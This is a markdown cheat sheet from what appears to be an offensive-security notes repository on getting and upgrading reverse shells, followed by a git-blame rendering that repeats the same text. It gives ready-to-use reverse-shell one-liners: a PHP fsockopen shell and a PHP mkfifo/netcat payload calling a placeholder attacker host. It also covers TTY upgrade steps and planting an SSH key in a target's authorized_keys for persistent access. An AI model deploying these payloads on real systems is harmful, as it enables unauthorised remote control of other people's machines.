killchain-compendium/Reverse Shells/Upgrade Shell.md

# Upgrade Reverse Shell 

* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)

## Via interpreter

### PHP

* reverse shell
```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```php
php -r 'exec ("/bin/bash")";' 
```
* Sometimes even
```php
php -e 'exec "/bin/bash";'
```

### Python 

```python
python -c 'import pty; pty.spawn("/bin/bash")'
```

### Perl

```perl
perl -e 'exec "/bin/sh";'
```

### Script

```sh
/usr/bin/script -qc /bin/bash /dev/null
```
or 
```sh
script /dev/null -c bash
```

## Next

1. `ctrl` + `z`
2. `stty echo -raw`
3. `fg`
4. `export SHELL=bash`
5. `export TERM=xterm`

## Via SSH

* `ssh-keygen`
* copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target

## As Code

### PHP

```sh
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
```
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`# Upgrade Reverse Shell`

			`* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)`
			`* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)`
			`* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)`

			`## Via interpreter`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`### PHP`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`* reverse shell`
			```php
			`php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'`
			```
			```php
			`php -r 'exec ("/bin/bash")";'`
			```
			`* Sometimes even`
			```php
			`php -e 'exec "/bin/bash";'`
			```

			`### Python`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			```python
			`python -c 'import pty; pty.spawn("/bin/bash")'`
			```

			`### Perl`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			```perl
			`perl -e 'exec "/bin/sh";'`
			```

			`### Script`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			```sh
			`/usr/bin/script -qc /bin/bash /dev/null`
			```
added MongoDB specifics 2022-12-09 00:00:02 +01:00			`or`
			```sh
			`script /dev/null -c bash`
			```
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00
			`## Next`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			1. `ctrl` + `z`
			2. `stty echo -raw`
			3. `fg`
			4. `export SHELL=bash`
			5. `export TERM=xterm`

			`## Via SSH`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			* `ssh-keygen`
			* copy priv key and `chmod 600`
			* `cat id_rsa.pub > authorized_keys` on target

			`## As Code`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			`### PHP`
added MongoDB specifics 2022-12-09 00:00:02 +01:00
restructured Misc and RevShells 2022-11-13 16:00:22 +01:00			```sh
			`<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>`
			```